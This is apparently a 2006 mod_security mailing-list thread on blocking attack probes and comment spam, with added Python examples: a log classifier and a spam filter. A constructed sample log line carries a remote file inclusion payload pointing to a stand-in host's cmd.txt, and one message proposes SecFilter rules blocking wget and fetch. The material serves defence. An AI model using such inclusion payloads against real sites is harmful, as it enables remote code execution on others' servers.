> > 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
> > 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
> > 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 403 219
> > 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
> > 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 222
> > 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
> > 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
> > 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
> >
> > -------------------------------------------------------
> > This SF.Net email is sponsored by xPML, a groundbreaking scripting language
> > that extends applications into web and mobile media. Attend the live webcast
> > and join the prime developer group breaking into this new coding territory!
> > http://sel.as-us.falkag.net/sel?cmd=lnk&kid=110944&bid=241720&dat=121642
> > _______________________________________________
> > mod-security-users mailing list
> > mod...@li...
> > https://lists.sourceforge.net/lists/listinfo/mod-security-users
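The quoted log shows the two patterns a defender wants to pick out automatically: a parameter (here mosConfig_absolute_path) whose value is a full URL, the mark of a remote file inclusion attempt, and one client POSTing to every xmlrpc.php location it can guess. This added example (not code from the thread) parses Apache access-log lines, tags both patterns and groups the hits per client; the sample lines are constructed using documentation IP ranges.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote

# Apache common/combined log format: client, ident, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# A parameter whose value is itself a URL is the signature of a remote file inclusion attempt.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def classify(line):
    """Return (client_ip, tags) for one log line, or None if it does not parse.
    Tags: 'rfi' for a URL-valued parameter, 'xmlrpc-probe' for a POST to any .../xmlrpc.php."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, query = m.group('target').partition('?')
    tags = []
    # parse_qsl already decodes once; unquote again so a double-encoded value is still seen.
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(unquote(value)):
            tags.append('rfi')
            break
    if m.group('method') == 'POST' and path.endswith('/xmlrpc.php'):
        tags.append('xmlrpc-probe')
    return m.group('ip'), tags

def summarize(log_text):
    """Tag counts per client, so one source firing several probe types stands out."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            ip, tags = result
            per_ip[ip].update(tags)
    return {ip: dict(c) for ip, c in per_ip.items() if c}

# Constructed sample lines (documentation IP ranges), shaped like the ones quoted in the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [23/Feb/2006:03:56:59 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://203.0.113.9/cmd.txt? HTTP/1.1" 404 223
198.51.100.7 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php HTTP/1.1" 403 212
198.51.100.7 - - [23/Feb/2006:03:57:03 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 403 217
192.0.2.44 - - [23/Feb/2006:04:01:10 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for ip, counts in summarize(SAMPLE_LOG).items():
        print(ip, counts)
```

Any URL-valued parameter is flagged, so a legitimate redirect or callback parameter will show up too; an allowlist of known parameter names is the usual refinement.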
From: Tom A. <tan...@oa...> - 2006-02-23 14:27:50
Zach Roberts wrote:
> I know at least a few of us that use mod_security to enhance security in
> a shared webhosting environment have tried to tackle the problem of
> comment spam. The idea of using mod_security rules to block it isn't
> new. See gotroot.com's blacklist.conf for their attempt at it.
...
> In my opinion what is needed is support for dnsbl type blacklists.
> Blar's mod_access_rbl was one attempt at this but the results aren't
> cached so it isn't very efficient.

If I were running a blog or forum, I might pipe requests through Bogofilter or another statistical filter in order to remove spam. That would be more effective than playing cat and mouse with IP addresses. I'd put an admin-only button on my software to allow me to flag a post as spam, thus training the filter with it. Questionable or "unsure" posts would go into a non-public holding list which could then be approved manually, and upon doing so, train the filter with them.

On my mail server, DNSBLs remove maybe half of all incoming spam. That's great and efficient, but not enough. The rest, up to about 99.9%, is removed through Bogofilter and a few helper scripts that do things like tag the email with the ASN of the sender and run any links through URLBLs, tagging the email with a token if they match. Out of thousands of spams per week, I only receive 1-2 false negatives and about 3-4 unsures, with no false positives.

I'm sure very similar measures could be employed to quash comment spam. Trying to do it with mod_security is probably going to be about as effective as filtering email with procmail. It looks like a good idea at first, and even works a little bit, but quickly becomes unmanageable and ineffective.

Tom
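Tom's workflow (a statistical filter, an admin button that trains it on flagged posts, and an "unsure" holding list for manual approval) as an added example, not code from the thread or from Bogofilter: a small naive Bayes classifier with a three-way verdict. The training comments and the cutoffs are constructed for the demonstration.

```python
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9]{2,}")

def tokenize(text):
    return set(TOKEN_RE.findall(text.lower()))

class CommentFilter:
    """Naive Bayes over comment text with a three-way verdict: ham, unsure, spam."""
    def __init__(self, spam_cutoff=0.9, ham_cutoff=0.2):
        self.tokens = {True: Counter(), False: Counter()}  # token document counts per label
        self.docs = {True: 0, False: 0}                    # comments seen per label
        self.spam_cutoff, self.ham_cutoff = spam_cutoff, ham_cutoff
        self.holding = []                                  # 'unsure' comments awaiting review

    def train(self, text, is_spam):  # admin verdict: what a "flag as spam"/approve button calls
        if text in self.holding:                           # resolving a held comment releases it
            self.holding.remove(text)
        self.tokens[is_spam].update(tokenize(text))
        self.docs[is_spam] += 1

    def spam_probability(self, text):  # P(spam | tokens), Laplace-smoothed, via log odds
        if not self.docs[True] or not self.docs[False]:
            return 0.5                                     # untrained: everything is unsure
        log_odds = math.log(self.docs[True] / self.docs[False])
        for tok in tokenize(text):
            p_spam = (self.tokens[True][tok] + 1) / (self.docs[True] + 2)
            p_ham = (self.tokens[False][tok] + 1) / (self.docs[False] + 2)
            log_odds += math.log(p_spam) - math.log(p_ham)
        return 1.0 / (1.0 + math.exp(-log_odds))

    def classify(self, text):
        p = self.spam_probability(text)
        if p >= self.spam_cutoff:
            return "spam"
        if p <= self.ham_cutoff:
            return "ham"
        self.holding.append(text)                          # park it for manual approval
        return "unsure"

# Constructed training comments (not from the thread): two ham, two spam.
HAM = ["Nice write up, the rule ordering section helped me fix my config",
       "Thanks, I had the same problem with the audit log on my server"]
SPAM = ["Buy cheap pills online, best prices, visit my site now",
        "Cheap loans and pills, click here for the best deal online"]
FILTER = CommentFilter()
for _text in HAM + SPAM:
    FILTER.train(_text, _text in SPAM)
```

A comment that lands in `holding` stays there until an admin calls `train` on it with the final verdict, which is the step that moves the filter's decision boundary.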
From: John T. <gma...@jt...> - 2006-02-23 14:10:20
Andras Got wrote:
> Just ban wget, fetch and other dl clients, suspicious names in URLs and

Apologies for my ignorance, but does this mean you add lines to the conf file as follows:

SecFilter wget
SecFilter fetch

> of course you should secure your PHP (safe_mode, disable_functions,
> open_basedir).

Does this apply if I am the only console user on the box? I read that safe mode breaks some apps and it is most commonly useful when the box is shared.

Also, if I may, what are the most dangerous functions you disable with disable_functions?